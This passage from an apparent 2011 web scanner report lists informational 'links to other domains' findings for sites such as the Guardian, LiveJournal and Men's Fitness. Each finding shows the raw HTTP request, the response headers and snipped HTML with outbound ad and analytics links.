Set-Cookie: visited=true; path=/; expires=Mon, 25-Jan-2021 04:41:06 GMT
Set-Cookie: _thepoint=e54b532010193ffb80929de47a093240; domain=.groupon.com; path=/; expires=Wed, 26 Jan 2011 04:41:06 GMT; HttpOnly
Status: 200
ETag: "cc98647c2c5c60b56a748ca5db959984"
X-S-COOKIE: 525bc5ae-283d-11e0-a3b5-005056957e9b
X-B-COOKIE: 525bb898-283d-11e0-a3b5-005056957e9b
X-Runtime: 72
Content-Length: 24855
Cache-Control: private, max-age=0, must-revalidate
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xmlns='http://www
...[SNIP]...
<meta content='7829106395' property='fb:app_id' />
<link href="http://assets1.grouponcdn.com/stylesheets/app/landing/index.css?zm9BnoJf" media="screen" rel="stylesheet" type="text/css" />
<link href="http://assets1.grouponcdn.com/stylesheets/app/subscriptions/subscribe_two_steps10.css?hm_Wnumm" media="screen" rel="stylesheet" type="text/css" />
<link href='/groupon.ico' rel='icon' />
...[SNIP]...
</script>
<script src="http://www.googleadservices.com/pagead/conversion.js" type="text/javascript"></script>
...[SNIP]...
<div style='display:inline;'><img alt="?label=u-p3cpox4weq3al15qm&script=0" border="0" height="0" src="http://www.googleadservices.com/pagead/conversion/1019040093/?label=U-p3CPOX4wEQ3aL15QM&script=0" width="1" /></div>
...[SNIP]...
<noscript>
<iframe src="http://fls.doubleclick.net/activityi;src=2895566;type=subsc017;cat=subsc432;u1=washington-dc;u2=;ord=1?" width="1" height="1" frameborder="0"></iframe>
...[SNIP]...
</h1>
<img alt="Save 50% to 90% on Top-Rated Local Deals" class="save_three_steps" src="http://assets1.grouponcdn.com/images/groupon/landing_pages/save_on_deals_blue4.gif?D9Bsq0Tc" />
<div class='city_name'>
...[SNIP]...
<div class='step'>
<img alt="Step 1 of 2" src="http://assets1.grouponcdn.com/images/groupon/landing_pages/step_1.gif?UNq811WL" />
</div>
...[SNIP]...
<div class='header_three_steps'>
<img alt="Confirm_city" src="http://assets1.grouponcdn.com/images/groupon/landing_pages/confirm_city.gif?4UuFdEOc" />
</div>
...[SNIP]...
<div class='step'>
<img alt="Step 2 of 2" src="http://assets1.grouponcdn.com/images/groupon/landing_pages/step_2.gif?kNhmeTIh" />
</div>
...[SNIP]...
<div class='header_three_steps'>
<img alt="Enter_email" src="http://assets1.grouponcdn.com/images/groupon/landing_pages/enter_email.gif?fyP2Y5Ml" />
</div>
...[SNIP]...
</script>

<img src="http://ads.bluelithium.com/pixel?id=620625&t=2" width="1" height="1" />

<img alt="?pid=263&cgn=13441&seg=3420" src="http://pixel.33across.com/ps/?pid=263&cgn=13441&seg=3420" />
</div>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.6/jquery-ui.min.js" type="text/javascript"></script>
<script src="http://assets1.grouponcdn.com/assets/subscriptions.js?B1519gUv" type="text/javascript"></script>
<script src="http://assets1.grouponcdn.com/javascripts/app/subscriptions/multi_steps.js?vGis9EFL" type="text/javascript"></script>
<script src="http://ajax.microsoft.com/ajax/jquery.validate/1.7/jquery.validate.js" type="text/javascript"></script>
<script src="http://assets1.grouponcdn.com/javascripts/app/subscriptions/alerts.js?IrgXe2LC" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://assets1.grouponcdn.com/javascripts/app/subscriptions/disable_on_submit.js?mFqOEBi1" type="text/javascript"></script>
...[SNIP]...

20.686. http://www.guardian.co.uk/media/2011/jan/24/amazon-lovefilm-deal-films/x26amp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.guardian.co.uk
Path:	/media/2011/jan/24/amazon-lovefilm-deal-films/x26amp

Issue detail

The page was loaded from a URL containing a query string:

http://www.guardian.co.uk/media/2011/jan/24/amazon-lovefilm-deal-films/x26amp;rct\\x3dj\\x26amp;sa\\x3dX\\x26amp;ei\\x3dh5I9TauLMMK88gazprSzCg\\x26amp;sqi\\x3d2\\x26amp;ved\\x3d0CIkBEKcCMAo\\x26amp;q\\x3damazon\\x26amp;usg\\x3dAFQjCNHMyB_Rk10da2jJg4TS5PCj5_BR7w\\x22

The response contains the following links to other domains:

http://adinfo-guardian.co.uk/
http://static.guim.co.uk/static/81552/networkfront/images/guardian_logo.gif

Request

GET /media/2011/jan/24/amazon-lovefilm-deal-films/x26amp;rct\\x3dj\\x26amp;sa\\x3dX\\x26amp;ei\\x3dh5I9TauLMMK88gazprSzCg\\x26amp;sqi\\x3d2\\x26amp;ved\\x3d0CIkBEKcCMAo\\x26amp;q\\x3damazon\\x26amp;usg\\x3dAFQjCNHMyB_Rk10da2jJg4TS5PCj5_BR7w\\x22 HTTP/1.1
Host: www.guardian.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 16:45:10 GMT
Server: Apache
Set-Cookie: GU_MU=VFQyc2xncjZEQ2NBQUE5aXRIVUFBQURlfHpnL2wyNjdSUGZ3VWY1cHFDSUpmQVE9PQ==; path=/; domain=.guardian.co.uk; expires=Thu, 21-Jan-2021 16:45:10 GMT
Set-Cookie: GU_LOCATION=dXNhOjU6Zmw6NDpob2xseXdvb2Q6NDo1Mjg6YnJvYWRiYW5kOiAyNi4wNDg6LTgwLjEyNUAyNDUxMTUxNTUxNTAxNjExMDYxNjExODc1MjE3MDU3MjkxMTAxMzUxMzA5OA==; path=/; domain=.guardian.co.uk; expires=Mon, 14-Feb-2011 16:45:10 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-GU-httpd: 10
P3P: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONa TELa OUR IND ONLi UNI PURi NAV STA PRE LOC"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 20899

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<a href="http://www.guardian.co.uk"><img src="http://static.guim.co.uk/static/81552/networkfront/images/guardian_logo.gif" height="52" width="343" alt="guardian.co.uk home" /></a>
...[SNIP]...
<li><a href="http://adinfo-guardian.co.uk/" name="&lid={areas/common/footer}{Advertising guide}&lpos={areas/common/footer}{4}">Advertising guide</a>
...[SNIP]...

20.687. http://www.hugg.com/submit previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hugg.com
Path:	/submit

Issue detail

The page was loaded from a URL containing a query string:

http://www.hugg.com/submit?url={u}

The response contains the following link to another domain:

http://www.treehugger.com/?url=%7bu%7d

Request

GET /submit?url={u} HTTP/1.1
Host: www.hugg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 04:41:22 GMT
Server: Apache/2.2.14
Location: http://www.treehugger.com/?url=%7bu%7d
Cache-Control: max-age=1
Expires: Tue, 25 Jan 2011 04:41:23 GMT
Content-Length: 222
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.treehugger.com/?url=%7bu%7d">here</a>
...[SNIP]...

20.688. http://www.jeroenwijering.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jeroenwijering.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://www.jeroenwijering.com/?item=JW_WMV_Player

The response contains the following link to another domain:

http://www.longtailvideo.com/players/jw-wmv-player/

Request

GET /?item=JW_WMV_Player HTTP/1.1
Host: www.jeroenwijering.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Tue, 25 Jan 2011 04:41:41 GMT
Server: Apache/2.2.3 (CentOS)
Location: http://www.longtailvideo.com/players/jw-wmv-player/
Cache-Control: max-age=300
Expires: Tue, 25 Jan 2011 04:46:41 GMT
Content-Length: 346
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.longtailvideo.com/players/jw-wmv-player/">here</a>
...[SNIP]...

20.689. http://www.linkagogo.com/go/AddNoPopup previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.linkagogo.com
Path:	/go/AddNoPopup

Issue detail

The page was loaded from a URL containing a query string:

http://www.linkagogo.com/go/AddNoPopup?url={u}&title={t}

The response contains the following link to another domain:

http://www.google-analytics.com/urchin.js

Request

GET /go/AddNoPopup?url={u}&title={t} HTTP/1.1
Host: www.linkagogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:41:54 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8b Resin/3.1.4
ETag: "AAAAS27el44"
Last-Modified: Tue, 25 Jan 2011 04:41:55 GMT
Cache-Control: no-cache
Expires: 0
Content-Length: 16313
Set-Cookie: cookies=Y; path=/
Set-Cookie: user=-1; path=/; expires=Mon, 16-Jan-2012 04:41:53 GMT
Set-Cookie: userName=guest; path=/; expires=Mon, 16-Jan-2012 04:41:53 GMT
Content-Type: text/html; charset=utf-8
Connection: close

<html lang="eng-US">
<head>
<link rel="search" type="application/opensearchdescription+xml" href="/addons/linkagogo_search.xml" title="linkaGoGo favorites search" />
<link rel="search" type="applicati
...[SNIP]...
</table>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

20.690. http://www.lithuanianjoomla.com/component/users/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/component/users/

Issue detail

The page was loaded from a URL containing a query string:

http://www.lithuanianjoomla.com/component/users/?view=reset&Itemid=

The response contains the following link to another domain:

http://www.joomla.org/

Request

GET /component/users/?view=reset&Itemid= HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:07:29 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 14216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<p>
Powered by <a href="http://www.joomla.org/">Joomla!®</a>
...[SNIP]...

20.691. http://www.liutilities.com/affcb/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.liutilities.com
Path:	/affcb/

Issue detail

The page was loaded from a URL containing a query string:

http://www.liutilities.com/affcb/?id=DSgen&aff=2736&xat=gen

The response contains the following link to another domain:

http://store.uniblue.com/278/purl-DSgen?affiliate=2736&x-at=gen

Request

GET /affcb/?id=DSgen&aff=2736&xat=gen HTTP/1.1
Host: www.liutilities.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Connection: close
Date: Mon, 24 Jan 2011 16:02:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: http://store.uniblue.com/278/purl-DSgen?affiliate=2736&x-at=gen
Content-Length: 188
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCAQDBDA=DLMAJEECAJLANPFOCGMPMNJJ; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://store.uniblue.com/278/purl-DSgen?affiliate=2736&x-at=gen">here</a>.</body>

20.692. http://www.livejournal.com/update.bml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.livejournal.com
Path:	/update.bml

Issue detail

The page was loaded from a URL containing a query string:

http://www.livejournal.com/update.bml?subject={u}

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/lj.servicepages/fullscreenadsbml;dcopt=ist;fs=1;sz=1x1;tile=1;ord=8934157304?
http://ad.doubleclick.net/ad/lj.servicepages/updatebml;sz=300x250;tile=1;ord=3212145872?
http://ad.doubleclick.net/ad/lj.servicepages/updatebml;sz=728x90;tile=2;ord=3212145872?
http://ad.doubleclick.net/jump/lj.servicepages/fullscreenadsbml;dcopt=ist;fs=1;tile=1;ord=8934157304?
http://ad.doubleclick.net/jump/lj.servicepages/updatebml;sz=300x250;tile=1;ord=3212145872?
http://ad.doubleclick.net/jump/lj.servicepages/updatebml;sz=728x90;tile=2;ord=3212145872?
http://aqua.livejournal.ru/
http://b.scorecardresearch.com/p?c1=2&c2=7602110&c3=&c4=&c5=&c6=&c15=&cj=1
http://livejournalinc.com/sales.php
http://www.livejournalinc.com/
http://www.livejournalinc.com/jobs/
http://www.zazzle.com/livejournal
https://www.zazzle.com/livejournal*

Request

GET /update.bml?subject={u} HTTP/1.1
Host: www.livejournal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 25 Jan 2011 04:43:07 GMT
Server: Apache/2.2.3 (CentOS)
X-AWS-Id: ws33
Set-Cookie: ljuniq=jzQTYmiEBa2zjKs:1295930587:pgstats0:m0; expires=Saturday, 26-Mar-2011 04:43:07 GMT; domain=.livejournal.com; path=/
X-XSS-Protection: 0
Cache-Control: private, proxy-revalidate
ETag: "c18ff03bfcaa62b5388099a4abe874d9"
Content-length: 48184
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<
...[SNIP]...
<NOSCRIPT>
<A rel="nofollow" HREF="http://ad.doubleclick.net/jump/lj.servicepages/updatebml;sz=728x90;tile=2;ord=3212145872?" target="_blank">
<img src="http://ad.doubleclick.net/ad/lj.servicepages/updatebml;sz=728x90;tile=2;ord=3212145872?"
width="728" height="90" border="0" alt=""></A>
...[SNIP]...
<NOSCRIPT>
<A rel="nofollow" HREF="http://ad.doubleclick.net/jump/lj.servicepages/fullscreenadsbml;dcopt=ist;fs=1;tile=1;ord=8934157304?" target="_blank">
<img src="http://ad.doubleclick.net/ad/lj.servicepages/fullscreenadsbml;dcopt=ist;fs=1;sz=1x1;tile=1;ord=8934157304?"
width="" height="" border="0" alt=""></A>
...[SNIP]...
<NOSCRIPT>
<A rel="nofollow" HREF="http://ad.doubleclick.net/jump/lj.servicepages/updatebml;sz=300x250;tile=1;ord=3212145872?" target="_blank">
<img src="http://ad.doubleclick.net/ad/lj.servicepages/updatebml;sz=300x250;tile=1;ord=3212145872?"
width="300" height="250" border="0" alt=""></A>
...[SNIP]...
<li><a href="http://livejournalinc.com/sales.php">Advertise</a>
...[SNIP]...
<li><a href="http://www.livejournalinc.com/jobs/">Jobs</a>
...[SNIP]...
<li><a href="http://www.livejournalinc.com/">More...</a>
...[SNIP]...
<li><a href="http://aqua.livejournal.ru/">LJ Aqua</a>
...[SNIP]...
<li><a href="https://www.zazzle.com/livejournal*">Merchandise</a>
...[SNIP]...
<li class=''><a href='http://www.zazzle.com/livejournal'>Merchandise</a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=7602110&c3=&c4=&c5=&c6=&c15=&cj=1" />
</noscript>
...[SNIP]...

20.693. http://www.lynda.com/landing/softwaretraining.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lynda.com
Path:	/landing/softwaretraining.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://www.lynda.com/landing/softwaretraining.aspx?AWKeyWord=Joomla!&CourseURL=http%3a%2f%2fwww.lynda.com%2fhome%2fViewCourses.aspx%3flpk0%3d370&Ptitle=Joomla+Tutorials+and+Training+Online&_kk=joomla%20course&_kt=546081e7-492f-4261-b08e-49b0a582fb58/

The response contains the following link to another domain:

https://lct.salesforce.com/sfga.js

Request

GET /landing/softwaretraining.aspx?AWKeyWord=Joomla!&CourseURL=http%3a%2f%2fwww.lynda.com%2fhome%2fViewCourses.aspx%3flpk0%3d370&Ptitle=Joomla+Tutorials+and+Training+Online&_kk=joomla%20course&_kt=546081e7-492f-4261-b08e-49b0a582fb58/ HTTP/1.1
Host: www.lynda.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

20.694. http://www.mensfitness.com/Tshirt_Workout/fitness/ab_exercises/136 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mensfitness.com
Path:	/Tshirt_Workout/fitness/ab_exercises/136

Issue detail

The page was loaded from a URL containing a query string:

http://www.mensfitness.com/Tshirt_Workout/fitness/ab_exercises/136?cid=RSS

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/ami.mf.fitness/abs;sz=1020x200;tile=9;aid=136;ord=123456789?
http://ad.doubleclick.net/ad/ami.mf.fitness/abs;sz=120x90;tile=6;aid=136;ord=123456789?
http://ad.doubleclick.net/ad/ami.mf.fitness/abs;sz=120x90;tile=7;aid=136;ord=123456789?
http://ad.doubleclick.net/ad/ami.mf.fitness/abs;sz=120x90;tile=8;aid=136;ord=123456789?
http://ad.doubleclick.net/ad/ami.mf.fitness/abs;sz=160x600;tile=2;aid=136;ord=123456789?
http://ad.doubleclick.net/ad/ami.mf.fitness/abs;sz=300x250,300x600;tile=4;aid=136;ord=123456789?
http://ad.doubleclick.net/ad/ami.mf.fitness/abs;sz=300x250;tile=3;aid=136;ord=123456789?
http://ad.doubleclick.net/ad/ami.mf.fitness/abs;sz=728x90;tile=1;aid=136;dcopt=ist;ord=123456789?
http://ad.doubleclick.net/ad/ami.mf.fitness/abs;sz=728x90;tile=5;aid=136;ord=123456789?
http://ad.doubleclick.net/ad/ami.mf.home/;sz=300x90;tile=10;ord=123456789?
http://ad.doubleclick.net/jump/ami.mf.fitness/abs;sz=1020x200;tile=9;aid=136;ord=123456789?
http://ad.doubleclick.net/jump/ami.mf.fitness/abs;sz=120x90;tile=6;aid=136;ord=123456789?
http://ad.doubleclick.net/jump/ami.mf.fitness/abs;sz=120x90;tile=7;aid=136;ord=123456789?
http://ad.doubleclick.net/jump/ami.mf.fitness/abs;sz=120x90;tile=8;aid=136;ord=123456789?
http://ad.doubleclick.net/jump/ami.mf.fitness/abs;sz=160x600;tile=2;aid=136;ord=123456789?
http://ad.doubleclick.net/jump/ami.mf.fitness/abs;sz=300x250,300x600;tile=4;aid=136;ord=123456789?
http://ad.doubleclick.net/jump/ami.mf.fitness/abs;sz=300x250;tile=3;aid=136;ord=123456789?
http://ad.doubleclick.net/jump/ami.mf.fitness/abs;sz=728x90;tile=1;aid=136;dcopt=ist;ord=123456789?
http://ad.doubleclick.net/jump/ami.mf.fitness/abs;sz=728x90;tile=5;aid=136;ord=123456789?
http://ad.doubleclick.net/jump/ami.mf.home/;sz=300x90;tile=10;ord=123456789?
http://b.scorecardresearch.com/b?c1=2&c2=6036076&c3=&c4=&c5=&c6=&c15=&cv=1.3&cj=1
http://coedmagazine.com/2011/01/14/5-things-girls-want-you-to-do-without-asking-renatas-recos/
http://digg.com/MensFitness
http://digg.com/users/MensFitness
http://edge.quantserve.com/quant.js
http://js.adsonar.com/js/adsonar.js
http://kona.kontera.com/javascript/lib/KonaLibInline.js
http://pixel.quantserve.com/pixel/p-94wNw88f65Rhk.gif?labels=MTVN%20Digital%20Tribes
http://pixel.quantserve.com/pixel/p-b0iPm4Hn8ATss.gif
http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0010/9242.js
http://s7.addthis.com/js/250/addthis_widget.js
http://secure-us.imrworldwide.com/cgi-bin/m?ci=us-mensfitness&cg=0&cc=1
http://secure-us.imrworldwide.com/v53.js
http://twitter.com/mens_fitness
http://well.blogs.nytimes.com/2011/01/12/the-hazards-of-the-couch/?src=me&ref=health
http://www.americanmediainc.com/
http://www.americanmediainc.com/brand/mens-fitness
http://www.askmen.com/fashion/fashiontip_600/660_sweatproof-your-clothes-sachin-on-fashion.html
http://www.countryweekly.com/
http://www.facebook.com/mensfitness
http://www.fitpregnancy.com/
http://www.flexonline.com/
http://www.google.com/coop/cse/brand?form=searchbox_014734126780622100582%3Auhizeh9wkiy
http://www.heavy.com/mma/mma-news/2011/01/why-the-ufc-supports-the-intrepid-fallen-heroes-fund/
http://www.muscleandfitness.com/
http://www.muscleandfitnesshers.com/
http://www.myspace.com/mens_fitness
http://www.nationalenquirer.com/
http://www.naturalhealthmag.com/
http://www.shape.com/
http://www.shape.com/lifestyle/entertainment-and-celebrities/top-bikini-models-of-all-time-where-are-they-now
http://www.spike.com/tribes/
http://www.starmagazine.com/
http://www.stephenbailey.com/life/business/why-is-aol-killing-asylum-com/
http://www.thesmokingjacket.com/entertainment/martin-luther-king-history
https://w1.buysub.com/loc/MTS/ccare
https://w1.buysub.com/loc/MTS/footer
https://w1.buysub.com/loc/MTS/gift
https://w1.buysub.com/loc/MTS/renew
https://w1.buysub.com/loc/MTS/subscribe

Request

GET /Tshirt_Workout/fitness/ab_exercises/136?cid=RSS HTTP/1.1
Host: www.mensfitness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:45:05 GMT
Server: Apache/2.2.3 (Red Hat)
Age: 0
Cache-Control: max-age=43200
Via: HTTP/1.1 cdn.mensfitness.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 16:45:05 GMT
Content-Type: text/html; charset=UTF-8
Via: 1.1 mdw107104 (MII-APC/1.6)
Connection: close
Content-Length: 45331

<html>
<head>

<title>The T-Shirt Body Workout - Men's Fitness</title>

<meta name="Description" content="Fill out your favorite tee with our exclusive eight-week program for bigger shoulders, chest,
...[SNIP]...
</a> | <a href="http://www.facebook.com/mensfitness" target="_blank">facebook</a> | <a href="http://www.myspace.com/mens_fitness" target="_blank">myspace</a> | <a href="http://digg.com/users/MensFitness" target="_blank">digg</a> | <a href="http://twitter.com/mens_fitness" target="_blank">twitter</a>
...[SNIP]...
<li><a href="http://www.myspace.com/mens_fitness" target="_blank">MF on MySpace</a>
...[SNIP]...
<li><a href="http://www.facebook.com/mensfitness" target="_blank">MF on Facebook</a>
...[SNIP]...
<li><a href="http://digg.com/users/MensFitness" target="_blank">MF on Digg</a>
...[SNIP]...
<li><a href="http://twitter.com/mens_fitness" target="_blank">MF on Twitter</a>
...[SNIP]...
<div align="center" id="left_subscribe_links">
<a href="https://w1.buysub.com/loc/MTS/subscribe" target="_blank">Subscribe</a> | <a href="https://w1.buysub.com/loc/MTS/renew" target="_blank">Renew</a><br>
<a href="https://w1.buysub.com/loc/MTS/gift" target="_blank">Give a Gift</a> | <a href="https://w1.buysub.com/loc/MTS/ccare" target="_blank">Service</a>
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/ami.mf.fitness/abs;sz=728x90;tile=1;aid=136;dcopt=ist;ord=123456789?" target="_blank"><img src="http://ad.doubleclick.net/ad/ami.mf.fitness/abs;sz=728x90;tile=1;aid=136;dcopt=ist;ord=123456789?" width="728" height="90" border="0" alt=""></a>
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/ami.mf.fitness/abs;sz=1020x200;tile=9;aid=136;ord=123456789?" target="_blank"><img src="http://ad.doubleclick.net/ad/ami.mf.fitness/abs;sz=1020x200;tile=9;aid=136;ord=123456789?" width="1020" height="200" border="0" alt=""></a>
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/ami.mf.fitness/abs;sz=160x600;tile=2;aid=136;ord=123456789?" target="_blank"><img src="http://ad.doubleclick.net/ad/ami.mf.fitness/abs;sz=160x600;tile=2;aid=136;ord=123456789?" width="160" height="600" border="0" alt=""></a>
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/ami.mf.fitness/abs;sz=120x90;tile=6;aid=136;ord=123456789?" target="_blank"><img src="http://ad.doubleclick.net/ad/ami.mf.fitness/abs;sz=120x90;tile=6;aid=136;ord=123456789?" width="120" height="90" border="0" alt=""></a>
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/ami.mf.fitness/abs;sz=120x90;tile=7;aid=136;ord=123456789?" target="_blank"><img src="http://ad.doubleclick.net/ad/ami.mf.fitness/abs;sz=120x90;tile=7;aid=136;ord=123456789?" width="120" height="90" border="0" alt=""></a>
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/ami.mf.fitness/abs;sz=120x90;tile=8;aid=136;ord=123456789?" target="_blank"><img src="http://ad.doubleclick.net/ad/ami.mf.fitness/abs;sz=120x90;tile=8;aid=136;ord=123456789?" width="120" height="90" border="0" alt=""></a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=mfer"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</a> <a href="http://twitter.com/mens_fitness" target="_blank" title="Twitter"><img src="/site/images/contact/contact-twitter-45.gif" alt="" width="45" height="45" border="0"></a> <a href="http://www.facebook.com/mensfitness" target="_blank" title="Facebook"><img src="/site/images/contact/contact-facebook-45.gif" alt="" width="45" height="45" border="0"></a> <a href="http://www.myspace.com/mens_fitness" target="_blank" title="MySpace"><img src="/site/images/contact/contact-myspace-45.gif" alt="" width="45" height="45" border="0"></a> <a href="http://digg.com/MensFitness" target="_blank" title="Digg"><img src="/site/images/contact/contact-digg-45.gif" alt="" width="45" height="45" border="0">
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=searchbox_014734126780622100582%3Auhizeh9wkiy"></script>
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/ami.mf.fitness/abs;sz=300x250;tile=3;aid=136;ord=123456789?" target="_blank"><img src="http://ad.doubleclick.net/ad/ami.mf.fitness/abs;sz=300x250;tile=3;aid=136;ord=123456789?" width="300" height="250" border="0" alt=""></a>
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/ami.mf.home/;sz=300x90;tile=10;ord=123456789?" target="_blank"><img src="http://ad.doubleclick.net/ad/ami.mf.home/;sz=300x90;tile=10;ord=123456789?" width="300" height="90" border="0" alt=""></a>
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/ami.mf.fitness/abs;sz=300x250,300x600;tile=4;aid=136;ord=123456789?" target="_blank"><img src="http://ad.doubleclick.net/ad/ami.mf.fitness/abs;sz=300x250,300x600;tile=4;aid=136;ord=123456789?" width="300" height="250" border="0" alt=""></a>
...[SNIP]...
<strong><a href="http://www.thesmokingjacket.com/entertainment/martin-luther-king-history" target="_blank">Martin Luther King, Jr.</a>
...[SNIP]...
<strong><a href="http://www.askmen.com/fashion/fashiontip_600/660_sweatproof-your-clothes-sachin-on-fashion.html" target="_blank">Sweating A Lot?</a>
...[SNIP]...
<strong><a href="http://coedmagazine.com/2011/01/14/5-things-girls-want-you-to-do-without-asking-renatas-recos/" target="_blank">5 Things Girls Want</a>
...[SNIP]...
<strong><a href="http://well.blogs.nytimes.com/2011/01/12/the-hazards-of-the-couch/?src=me&ref=health" target="_blank">The Hazards of the Couch</a>
...[SNIP]...
<strong><a href="http://www.heavy.com/mma/mma-news/2011/01/why-the-ufc-supports-the-intrepid-fallen-heroes-fund/" target="_blank">Fight for the Troops</a>
...[SNIP]...
<strong><a href="http://www.stephenbailey.com/life/business/why-is-aol-killing-asylum-com/" target="_blank">Asylum.com Being Shut Down</a>
...[SNIP]...
<strong><a href="http://www.shape.com/lifestyle/entertainment-and-celebrities/top-bikini-models-of-all-time-where-are-they-now" target="_blank">Top Bikini Models of All-Time</a>
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/ami.mf.fitness/abs;sz=728x90;tile=5;aid=136;ord=123456789?" target="_blank"><img src="http://ad.doubleclick.net/ad/ami.mf.fitness/abs;sz=728x90;tile=5;aid=136;ord=123456789?" width="728" height="90" border="0" alt=""></a>
...[SNIP]...
</a> |
<a href="https://w1.buysub.com/loc/MTS/footer">Subscribe</a>
...[SNIP]...
</a> |
<a href="http://www.americanmediainc.com/brand/mens-fitness" target="_blank"> Advertising Information</a>
...[SNIP]...
<br>
© 2011 Weider Publications, LLC, a subsidiary of <a href="http://www.americanmediainc.com" target="_new">American Media, Inc.</a>
...[SNIP]...
<br>
